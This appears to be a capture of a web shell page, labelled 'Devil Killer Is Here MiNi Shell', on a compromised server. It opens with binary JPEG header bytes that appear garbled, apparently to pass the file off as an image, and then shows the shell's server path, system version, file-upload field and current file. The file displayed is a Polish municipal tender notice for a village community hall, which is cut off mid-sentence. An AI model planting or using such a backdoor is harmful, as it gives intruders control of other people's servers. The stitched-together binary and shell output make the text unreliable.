JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220512/0015613801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa budynku świetlicy wiejskiej w Kuźnicy Lechowej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mykanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Samorządowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mykanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mykanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mykanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa budynku świetlicy wiejskiej w Kuźnicy Lechowej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b7e4491d-d1e5-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00156138</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019827/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa całorocznego domku na cele wiejskie w miejscowości Kuźnica Lechowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mykanow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mykanow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem https://platformazakupowa.pl/ pod<br/>adresem: https://platformazakupowa.pl/pn/mykanow/proceedings<br/>Zamawiający informuje, że instrukcje korzystania z https://platformazakupowa.pl/ dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu https://platformazakupowa.pl/<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>4)Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i<br/>otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/ do<br/>konkretnego wykonawcy.<br/>7) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na https://platformazakupowa.pl/ ,tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na https://platformazakupowa.pl/ odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>11) Zamawiający wymaga, by formaty dokumentów sporządzanych przez Wykonawcę były zgodne z<br/>załącznikiem nr 2 do rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych i<br/>jednocześnie rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>12) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów:<br/>a) .zip<br/>b) .7Z<br/>13) Wśród formatów powszechnych a NIE występujących w rozporządzeniu<br/>występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za<br/>złożone nieskutecznie.<br/>14) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym,<br/>który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp<br/>służącej do składania podpisu osobistego, który wynosi max 5MB. 15) Ze względu na niskie ryzyko<br/>naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich<br/>podpisem kwalifikowanym PadES. 16) Pliki w innych formatach niż PDF zaleca się opatrzyć<br/>zewnętrznym podpisem XAdES.<br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem<br/>podpisywanym.19) Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za<br/>pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Mykanowie<br/>jest Wójt Gminy Mykanów z siedzibą: ul. Samorządowa 1, 42‑233 Mykanów;<br/>2) we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych może się Pani/Pan kontaktować z<br/>Inspektorem Ochrony Danych Gminy Mykanów pod adresem e‑mail:<br/>ewa.olejarz@mykanow.pl lub na adres siedziby Urzędu Gminy w Mykanowie ul. Samorządowa 1 42-<br/>233 Mykanów;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>przetargu nieograniczonego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. -<br/>Prawo zamówień publicznych (dalej ustawy Pzp) oraz podmioty uprawnione do ich przetwarzania na<br/>podstawie przepisów prawa;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane będą następnie<br/>przechowywane w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na<br/>podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych<br/>rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów<br/>zakładowych, chyba, że przepisy szczególne stanowią inaczej;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany i nie będą profilowane;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Obowiązek informacyjny określony przepisami RODO spoczywa także na Wykonawcach, którzy<br/>pozuskują dane osobowe osób trzecich w celu przekazania ich Zamawiającemu w ofertach. Dla<br/>uzyskania przez Zamawiającego potwierdzenia, że osoby, których dane osobowe są przekazywane<br/>Zamawiającemu, dysponują już wskazanymi informacjami, jak również w celu właściwego<br/>zabezpieczenia i ochrony danych tych osób, z których Wykonawca będzie korzystał, przekazanych<br/>przez Wykonawcę w ofercie celem uzyskania przedmiotowego zamówienia publicznego wymagane<br/>jest oświadczenie Wykonawcy dotyczące pozyskania przez Wykonawcę danych osobowych od osób<br/>trzecich, które zawarte jest w formularzu oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKZ.271.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac obejmuje:<br/> Budowę budynku świetlicy wiejskiej<br/> Budynek jest wyposażony w instalacje wewnętrzne tj. instalacja elektryczna, panele FV,<br/>instalacja wodociągowa, c.o., wentylacja grawitacyjna, Instalacja kanalizacyjna<br/> Budowa przyłącza kanalizacji sanitarnej<br/> Budowa przyłącza energetycznego<br/> Budowa przyłącza wodociągowego<br/>Do zadań Wykonawcy należeć będzie również uprzątnięcie i uporządkowanie terenu po<br/>wykonanych pracach, opróżnienie budowy z powstałych odpadów, wykonanie inwentaryzacji<br/>powykonawczej oraz dokonanie wszystkich odbiorów, opinii, uzyskania decyzji, w tym<br/>decyzji o pozwoleniu na użytkowanie obiektu.<br/>W związku z budową instalacji fotowoltaicznej, Wykonawca zobowiązany jest do wykonania<br/>wszelkich prób, sprawdzeń, pomiarów, badań, ekspertyz, regulacji i rozruchu pozwalających<br/>na eksploatację instalacji, konfiguracji inwertera do połączenia z siecią Internet w celu<br/>monitorowania produkcji energii, przyłączenie instalacji do sieci elektroenergetycznej, z<br/>opracowaniem niezbędnej dokumentacji i uzyskaniem wymaganych pozwoleń w imieniu<br/>Zamawiającego, opracowanie instrukcji obsługi eksploatacji urządzeń, instalacji i sieci oraz<br/>przeszkolenie pracowników w zakresie bieżącej obsługi instalacji, przeprowadzenie<br/>procedury włączenia do sieci OSD ( TAURON DYSTRYBUCJA S.A.) mikroinstalacji<br/>fotowoltaicznych, opracowanie audytu energetycznego.Celem sporządzenia oferty należy również zapoznać się z dokumentacją projektową,<br/>STWiOR oraz przedmiarami robót, który jest załącznikiem n 8 do niniejszej SWZ.<br/>Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych<br/>o parametrach technicznych nie gorszych niż określono w dokumentacji technicznej.<br/>Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego,<br/>jest obowiązany wykazać, że oferowane przez niego dostawy materiałów do realizacji<br/>zadania spełniają wymagania określone przez Zamawiającego.<br/>Zgodnie z art.101 ust.4 ustawy Pzp w sytuacji, gdyby w dokumentacji, a więc w dokumentach<br/>opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art.101<br/>ust.1 pkt2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”,<br/>to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, europejskiej<br/>ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych.<br/>W związku z powyższym należy przyjąć, ze każdej: normie, europejskiej ocenie<br/>technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących<br/>w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. Zgodnie z<br/>art.101 ust.5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art.104-107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia.<br/>Wykonawca w okresie udzielonej gwarancji jest zobowiązany do przeprowadzania niezbędnych<br/>przeglądów serwisowych zamontowanych urządzeń na swój koszt<br/>, natomiast Zamawiający płaci za niezbędne materiały eksploatacyjne w cenach porównywalnych<br/>do cen rynkowych.<br/>Do zadań Wykonawcy należeć będzie również: urządzenie zaplecza placu budowy, przestrzegania<br/>przepisów Kodeksu Pracy, BHP, ochrony zdrowia i p.poż., zabezpieczenie placu budowy<br/>przed dostępem osób trzecich, odpowiednie oznakowanie prowadzonych robót.<br/>Zamawiający wymaga aby Wykonawca przed przystąpieniem do robót i w trakcie kontrolował<br/>i potwierdził rzeczywiste posadowienie w terenie istniejącej podziemnej infrastruktury<br/>technicznej (punktowe odkrywki).<br/>Zamawiający nie dopuszcza możliwości roszczeń Wykonawcy z tytułu błędnego oszacowania<br/>ceny lub pominięcia kosztów i innych czynników mających lub mogących mieć wpływ na<br/>cenę.<br/>Na podstawie art.95 ust.1 „ Zamawiający wymaga zatrudnienia przez wykonawcę,<br/>podwykonawcę lub dalszego podwykonawcę osób wykonujących wszelkie czynności<br/>wchodzące w tzw.koszty bezpośrednie na podstawie umowy o pracę. Tak, więc wymóg ten<br/>dotyczy następujących czynności: operatorów sprzętu, pracowników fizycznych.<br/>Sposób weryfikacji zatrudnienia tych osób, uprawnienia Zamawiającego w zakresie kontroli<br/>spełniania przez Wykonawcę wymagan związanych z zatrudnieniem tych osób oraz sankcji z<br/>tytułu niespełnienia tych wamagań zawarto we wzorze umowy paragraf 10<br/>– załącznik nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">94</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">6</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Na podstawie art.112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>- Zamawiający nie stawia warunku w tym zakresie<br/>1.3. sytuacji ekonomicznej lub finansowej<br/>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli:<br/>a) Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 500 000zł<br/>Uwaga:<br/>Zamawiający dopuszcza, że w przypadku, gdy ofertę składają wykonawcy wspólnie<br/>ubiegający się o zamówienie to okreslony warunek musi spełniać jeden z wykonawców.<br/>1.4. zdolności technicznej lub zawodowej<br/>- Zamawiający uzna, ze wykonawca spełnia warunek, jeżeli:<br/>a) wykonanie w okresie otatnich pięciu lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, zrealizował i prawidłowo<br/>ukończył, co najmniej 1 robotę budowlaną polegającą na budowie lub<br/>rozbudowie lub nadbudowie lub remoncie budynku o pow. minimum 90m2 wraz z<br/>instalacjami wod.- kan. i instalacją elektryczną oraz budowie instalacji fotowoltaicznej<br/>o mocy minimum 6,0 kWp. Zamawiający dopuszcza również spełnienie warunku<br/>poprzez wykazanie dwóch robót: jednej dotyczącej budowy lub rozbudowy lub<br/>nadbudowy lub remontu budynku o pow. minimum 90 